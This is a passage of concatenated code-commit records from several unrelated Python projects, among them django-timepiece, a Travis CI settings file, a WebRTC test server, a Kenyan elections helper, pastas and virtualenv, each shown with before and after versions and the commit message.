author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"django-selectable==0.2.0",
],
)
| <commit_before>from setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"textile==2.1.4",
"django-selectable==0.2.0",
],
)
<commit_msg>Remove textile requirement from install_requires<commit_after>from setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"django-selectable==0.2.0",
],
)
|
c8360831ab2fa4d5af2929a85beca4a1f33ef9d1 | travis_settings.py | travis_settings.py | # Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': '',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
| # Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': 'travis',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
| Use MySQL database backend in Travis CI. | Use MySQL database backend in Travis CI.
| Python | bsd-3-clause | Inter-Actief/alexia,Inter-Actief/alexia,Inter-Actief/alexia,Inter-Actief/alexia | # Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': '',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
Use MySQL database backend in Travis CI. | # Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': 'travis',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
| <commit_before># Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': '',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
<commit_msg>Use MySQL database backend in Travis CI.<commit_after> | # Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': 'travis',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
| # Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': '',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
Use MySQL database backend in Travis CI.# Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': 'travis',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
| <commit_before># Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': '',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
<commit_msg>Use MySQL database backend in Travis CI.<commit_after># Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': 'travis',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
|
b69f69b0e89a49b427292ec179e12bdee6fb4743 | samples/web/content/testrtc/testrtc.py | samples/web/content/testrtc/testrtc.py | #!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
app = webapp2.WSGIApplication([
('/', MainPage),
], debug=True)
| #!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import random
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
# Generate 10 kilobytes of random data and create a 10MB buffer from it.
random_file = bytearray([random.randint(0,127) for i in xrange(0,10000)] * 1000)
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
class TestDownloadFile(webapp2.RequestHandler):
def get(self, size_kbytes):
self.response.headers.add_header("Access-Control-Allow-Origin", "*")
self.response.headers['Content-Type'] = 'application/octet-stream'
self.response.out.write(random_file[0: int(size_kbytes)*1000])
app = webapp2.WSGIApplication([
('/', MainPage),
(r'/test-download-file/(\d?\d00)KB.data', TestDownloadFile),
], debug=True)
| Add ability to download a random file with a given size from any domain. | Add ability to download a random file with a given size from any domain.
| Python | bsd-3-clause | xdumaine/adapter,mulyoved/samples,ralic/testrtc,82488059/apprtc,mauricionr/samples,smayoorans/samples,shelsonjava/testrtc,4lejandrito/adapter,TribeMedia/testrtc,YouthAndra/apprtc,JiYou/apprtc,fetterov/samples,82488059/apprtc,webrtc/samples,TribeMedia/samples,dengshaodong/docker-apprtc,4lejandrito/adapter,diddie06/webrtc,smbale/samples,jjrasche/cell-based-RC-control,bpyoung92/apprtc,todotobe1/samples,fippo/webrtc,virajs/samples,webrtc/testrtc,oliverhuangchao/samples,jjrasche/cell-based-RC-control,samdutton/webrtc,YouthAndra/apprtc,volkanh/volkanh.github.io,MahmoudFouad/samples,jjrasche/cell-based-RC-control,tsruban/samples,calebboyd/adapter,b-cuts/samples,jan-ivar/samples,tsruban/samples,Edward-Shawn/samples,JiYou/apprtc,shelsonjava/apprtc,procandi/apprtc,aadebuger/docker-apprtc,TribeMedia/apprtc,smadhusu/AppRTC,smbale/samples,jarl-alejandro/apprtc,shaohung001/samples,MahmoudFouad/samples,guoweis/webrtc,mvenkatesh431/apprtc,shelsonjava/apprtc,overtakermtg/samples,arnauorriols/apprtc,arnauorriols/apprtc,shaohung001/samples,oliverhuangchao/samples,jessetane/testrtc,todotobe1/apprtc,smadhusu/AppRTC,samdutton/webrtc,TribeMedia/testrtc,akashrchoksi/newone,shelsonjava/testrtc,dushmis/webrtc,bbandaru/samples,pquochoang/samples,myself659/samples,smadhusu/AppRTC,bemasc/samples,arnauorriols/apprtc,YouthAndra/apprtc,dengshaodong/docker-apprtc,samdutton/apprtc,kod3r/samples,martin7890/samples,webrtc/apprtc,jan-ivar/samples,TribeMedia/apprtc,fippo/apprtc,shelsonjava/samples,jarl-alejandro/apprtc,mvenkatesh431/apprtc,jarl-alejandro/apprtc,arnauorriols/apprtc,harme199497/adapter,mauricionr/samples,shelsonjava/apprtc,webrtc/adapter,TribeMedia/testrtc,82488059/apprtc,Edward-Shawn/samples,bpyoung92/apprtc,aadebuger/docker-apprtc,YouthAndra/apprtc,virajs/testrtc,Roarz/samples,pquochoang/samples,kod3r/samples,bbandaru/samples,Edward-Shawn/samples,todotobe1/samples,askdaddy/samples,4lejandrito/adapter,jiayliu/apprtc,xdumaine/samples,virajs/apprtc,dajise/samples,martin7890/samples,bpyoung92/apprtc,Roarz/samples,webrtc/apprtc,arnauorriols/apprtc,mvenkatesh431/samples,jarl-alejandro/apprtc,knightsofaa/webrtc,mulyoved/samples,leehz/samples,mvenkatesh431/apprtc,fippo/apprtc,shelsonjava/samples,jiayliu/apprtc,akashrchoksi/newone,b-cuts/samples,Acidburn0zzz/adapter,todotobe1/apprtc,dajise/samples,calebboyd/adapter,virajs/apprtc,procandi/apprtc,smayoorans/samples,JiYou/apprtc,keshwans/samples,mvenkatesh431/apprtc,TribeMedia/samples,harme199497/adapter,fippo/webrtc,TheKnarf/apprtc,virajs/samples,EmreAkkoyun/sample,fitraditya/samples,overtakermtg/samples,xdumaine/samples,virajs/apprtc,YouthAndra/apprtc,TribeMedia/apprtc,Roarz/samples,ralic/testrtc,samdutton/apprtc,fitraditya/samples,Zauberstuhl/adapter,jessetane/testrtc,juberti/samples,jiayliu/apprtc,jessetane/testrtc,shelsonjava/testrtc,shelsonjava/samples,fetterov/samples,ralic/testrtc,Acidburn0zzz/adapter,jarl-alejandro/apprtc,fippo/apprtc,TribeMedia/testrtc,JiYou/apprtc,TribeMedia/apprtc,shines/adapter,smayoorans/samples,myself659/samples,bemasc/samples,jan-ivar/adapter,EmreAkkoyun/sample,oliverhuangchao/samples,virajs/testrtc,webrtc/testrtc,smadhusu/AppRTC,overtakermtg/samples,calebboyd/adapter,procandi/apprtc,pquochoang/samples,virajs/samples,TheKnarf/apprtc,mauricionr/samples,dajise/samples,martin7890/samples,bemasc/samples,Zauberstuhl/adapter,shelsonjava/apprtc,smadhusu/AppRTC,virajs/apprtc,jjrasche/cell-based-RC-control,samdutton/apprtc,leehz/samples,todotobe1/apprtc,juberti/samples,tsruban/samples,fippo/apprtc,xdumaine/samples,dengshaodong/docker-apprtc,dengshaodong/docker-apprtc,EmreAkkoyun/sample,bpyoung92/apprtc,b-cuts/samples,guoweis/webrtc,MahmoudFouad/samples,Acidburn0zzz/adapter,taylor-b/samples,leehz/samples,jessetane/testrtc,mvenkatesh431/apprtc,todotobe1/apprtc,smbale/samples,aadebuger/docker-apprtc,samdutton/apprtc,shines/adapter,guoweis/webrtc,aadebuger/docker-apprtc,procandi/apprtc,jiayliu/apprtc,procandi/samples,webrtc/apprtc,JiYou/apprtc,mvenkatesh431/samples,harme199497/adapter,TheKnarf/apprtc,TheKnarf/apprtc,keshwans/samples,procandi/samples,jan-ivar/adapter,mvenkatesh431/samples,bbandaru/samples,82488059/apprtc,shelsonjava/apprtc,samdutton/apprtc,webrtc/adapter,volkanh/volkanh.github.io,TribeMedia/apprtc,ralic/samples,shelsonjava/testrtc,mulyoved/samples,shines/adapter,bpyoung92/apprtc,ralic/testrtc,fetterov/samples,virajs/testrtc,virajs/testrtc,fitraditya/samples,dengshaodong/docker-apprtc,82488059/apprtc,TheKnarf/apprtc,procandi/apprtc,webrtc/apprtc,myself659/samples,Zauberstuhl/adapter,fippo/apprtc,knightsofaa/webrtc,TribeMedia/samples,kod3r/samples,todotobe1/apprtc,jiayliu/apprtc,akashrchoksi/newone,askdaddy/samples,ralic/samples,volkanh/volkanh.github.io,xdumaine/adapter,virajs/apprtc,procandi/samples,diddie06/webrtc,taylor-b/samples,dushmis/webrtc,aadebuger/docker-apprtc,todotobe1/samples,webrtc/apprtc,webrtc/samples,ralic/samples | #!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
app = webapp2.WSGIApplication([
('/', MainPage),
], debug=True)
Add ability to download a random file with a given size from any domain. | #!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import random
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
# Generate 10 kilobytes of random data and create a 10MB buffer from it.
random_file = bytearray([random.randint(0,127) for i in xrange(0,10000)] * 1000)
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
class TestDownloadFile(webapp2.RequestHandler):
def get(self, size_kbytes):
self.response.headers.add_header("Access-Control-Allow-Origin", "*")
self.response.headers['Content-Type'] = 'application/octet-stream'
self.response.out.write(random_file[0: int(size_kbytes)*1000])
app = webapp2.WSGIApplication([
('/', MainPage),
(r'/test-download-file/(\d?\d00)KB.data', TestDownloadFile),
], debug=True)
| <commit_before>#!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
app = webapp2.WSGIApplication([
('/', MainPage),
], debug=True)
<commit_msg>Add ability to download a random file with a given size from any domain.<commit_after> | #!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import random
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
# Generate 10 kilobytes of random data and create a 10MB buffer from it.
random_file = bytearray([random.randint(0,127) for i in xrange(0,10000)] * 1000)
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
class TestDownloadFile(webapp2.RequestHandler):
def get(self, size_kbytes):
self.response.headers.add_header("Access-Control-Allow-Origin", "*")
self.response.headers['Content-Type'] = 'application/octet-stream'
self.response.out.write(random_file[0: int(size_kbytes)*1000])
app = webapp2.WSGIApplication([
('/', MainPage),
(r'/test-download-file/(\d?\d00)KB.data', TestDownloadFile),
], debug=True)
| #!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
app = webapp2.WSGIApplication([
('/', MainPage),
], debug=True)
Add ability to download a random file with a given size from any domain.#!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import random
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
# Generate 10 kilobytes of random data and create a 10MB buffer from it.
random_file = bytearray([random.randint(0,127) for i in xrange(0,10000)] * 1000)
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
class TestDownloadFile(webapp2.RequestHandler):
def get(self, size_kbytes):
self.response.headers.add_header("Access-Control-Allow-Origin", "*")
self.response.headers['Content-Type'] = 'application/octet-stream'
self.response.out.write(random_file[0: int(size_kbytes)*1000])
app = webapp2.WSGIApplication([
('/', MainPage),
(r'/test-download-file/(\d?\d00)KB.data', TestDownloadFile),
], debug=True)
| <commit_before>#!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
app = webapp2.WSGIApplication([
('/', MainPage),
], debug=True)
<commit_msg>Add ability to download a random file with a given size from any domain.<commit_after>#!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import random
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
# Generate 10 kilobytes of random data and create a 10MB buffer from it.
random_file = bytearray([random.randint(0,127) for i in xrange(0,10000)] * 1000)
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
class TestDownloadFile(webapp2.RequestHandler):
def get(self, size_kbytes):
self.response.headers.add_header("Access-Control-Allow-Origin", "*")
self.response.headers['Content-Type'] = 'application/octet-stream'
self.response.out.write(random_file[0: int(size_kbytes)*1000])
app = webapp2.WSGIApplication([
('/', MainPage),
(r'/test-download-file/(\d?\d00)KB.data', TestDownloadFile),
], debug=True)
|
95ebac75381580fe3767d7c9e287226a75bc43bf | elections/kenya/lib.py | elections/kenya/lib.py | from __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^Member of Parliament for ', '', post_label)
| from __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^(County Assembly Member for|Member of the National Assembly for|County Governor for|Women Representative for|Senator for|President of)\s+', '', post_label)
| Implement post label abbreviation for current posts | KE: Implement post label abbreviation for current posts
| Python | agpl-3.0 | mysociety/yournextrepresentative,mysociety/yournextmp-popit,mysociety/yournextrepresentative,mysociety/yournextrepresentative,mysociety/yournextmp-popit,mysociety/yournextrepresentative,mysociety/yournextmp-popit,mysociety/yournextmp-popit,mysociety/yournextmp-popit,mysociety/yournextrepresentative | from __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^Member of Parliament for ', '', post_label)
KE: Implement post label abbreviation for current posts | from __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^(County Assembly Member for|Member of the National Assembly for|County Governor for|Women Representative for|Senator for|President of)\s+', '', post_label)
| <commit_before>from __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^Member of Parliament for ', '', post_label)
<commit_msg>KE: Implement post label abbreviation for current posts<commit_after> | from __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^(County Assembly Member for|Member of the National Assembly for|County Governor for|Women Representative for|Senator for|President of)\s+', '', post_label)
| from __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^Member of Parliament for ', '', post_label)
KE: Implement post label abbreviation for current postsfrom __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^(County Assembly Member for|Member of the National Assembly for|County Governor for|Women Representative for|Senator for|President of)\s+', '', post_label)
| <commit_before>from __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^Member of Parliament for ', '', post_label)
<commit_msg>KE: Implement post label abbreviation for current posts<commit_after>from __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^(County Assembly Member for|Member of the National Assembly for|County Governor for|Women Representative for|Senator for|President of)\s+', '', post_label)
|
17cee8fe32a38f976e8548993fa57857f84943ef | pastas/version.py | pastas/version.py | # This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0b'
| # This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0'
| Prepare update of Master to v0.20.0 | Prepare update of Master to v0.20.0
| Python | mit | pastas/pastas | # This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0b'
Prepare update of Master to v0.20.0 | # This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0'
| <commit_before># This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0b'
<commit_msg>Prepare update of Master to v0.20.0<commit_after> | # This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0'
| # This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0b'
Prepare update of Master to v0.20.0# This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0'
| <commit_before># This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0b'
<commit_msg>Prepare update of Master to v0.20.0<commit_after># This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0'
|
3830ef5200f3d1763be5d162f5123cd59ca1da0b | virtualenv/__init__.py | virtualenv/__init__.py | from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
from virtualenv.core import create
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
):
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create",
]
| from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
# some support for old api in legacy virtualenv
from virtualenv.core import create
from virtualenv.__main__ import main # flake8: noqa
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create", "create_environment", "main",
]
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
): # flake8: noqa
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
| Add a main function (more support for the api in the legacy virtualenv). | Add a main function (more support for the api in the legacy virtualenv).
| Python | mit | ionelmc/virtualenv,ionelmc/virtualenv,ionelmc/virtualenv | from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
from virtualenv.core import create
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
):
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create",
]
Add a main function (more support for the api in the legacy virtualenv). | from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
# some support for old api in legacy virtualenv
from virtualenv.core import create
from virtualenv.__main__ import main # flake8: noqa
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create", "create_environment", "main",
]
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
): # flake8: noqa
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
| <commit_before>from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
from virtualenv.core import create
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
):
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create",
]
<commit_msg>Add a main function (more support for the api in the legacy virtualenv).<commit_after> | from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
# some support for old api in legacy virtualenv
from virtualenv.core import create
from virtualenv.__main__ import main # flake8: noqa
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create", "create_environment", "main",
]
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
): # flake8: noqa
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
